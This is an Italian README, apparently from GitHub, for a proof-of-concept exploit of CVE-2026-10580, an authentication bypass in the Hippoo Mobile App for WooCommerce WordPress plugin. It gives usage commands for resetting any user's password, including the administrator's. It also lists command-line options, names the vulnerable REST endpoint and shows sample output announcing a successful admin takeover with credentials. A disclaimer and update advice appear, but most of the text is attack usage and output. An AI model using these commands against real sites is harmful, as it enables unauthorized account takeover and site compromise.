
Exploit PoC per CVE-2026-10580 - Bypass dell'autenticazione nell'app mobile Hippoo per WooCommerce <= 1.9.4 che porta alla presa di controllo dell'account amministratore
Questo strumento è un exploit proof-of-concept per CVE-2026-10580, una vulnerabilità di bypass dell'autenticazione che interessa il plugin WordPress Hippoo Mobile App for WooCommerce (versioni <= 1.9.4). La vulnerabilità consente ad attaccanti non autenticati di reimpostare la password di qualsiasi utente, inclusi gli amministratori, portando al completo takeover del sito.
⚠️ Importante: Questo strumento è solo per test di sicurezza autorizzati e scopi educativi. L'uso non autorizzato contro sistemi di cui non si è proprietari o per cui non si ha esplicito permesso di test è illegale.
requestsInstalla le dipendenze:
pip install requests
python3 exploit.py -t https://target-site.com -p NewPassword123!
Exploit con ID amministratore predefinito (1) e verifica SSL:
python3 exploit.py -t https://example.com -p PwnedCVE2026!!
Destinazione di un ID utente specifico e disabilitazione della verifica SSL:
python3 exploit.py -t https://example.com -p NewPass123 -i 2 -k
Esecuzione senza banner:
python3 exploit.py -t https://example.com -p NewPass123 --no-banner
[+] Trovati 3 utenti
- ID utente: 1 | Nome utente: admin | Ruolo: amministratore
- ID utente: 2 | Nome utente: editor_user | Ruolo: editor
- ID utente: 3 | Nome utente: subscriber1 | Ruolo: subscriber
╔══════════════════════════════════════════════════════════════╗
║ TAKEOVER ADMIN RIUSCITO ║
╚══════════════════════════════════════════════════════════════╝
Destinazione: https://example.com
Login: https://example.com/wp-admin
Nome utente: admin
Password: PwnedCVE2026!!
Se stai utilizzando il plugin Hippoo, aggiornalo immediatamente a una versione corretta (>1.9.4). Inoltre:
/wp-json/wc-hippoo/v1/ext/wp/v2/usersQuesto progetto è distribuito sotto la Licenza MIT. Vedi il file LICENSE per i dettagli.
0xgh057r3c0n
L'autore non è responsabile per qualsiasi uso improprio di questo strumento. Usalo in modo responsabile e solo su sistemi di cui sei proprietario o per cui hai esplicito permesso di test.
| Argomento | Descrizione |
|---|
-t, --target | URL del sito WordPress di destinazione (es., https://example.com) |
-p, --password | Nuova password da impostare per l'account amministratore |
-i, --id | ID utente di cui effettuare il takeover (predefinito: 1) |
-k, --insecure | Salta la verifica del certificato SSL |
--no-banner | Sopprimi il banner ASCII |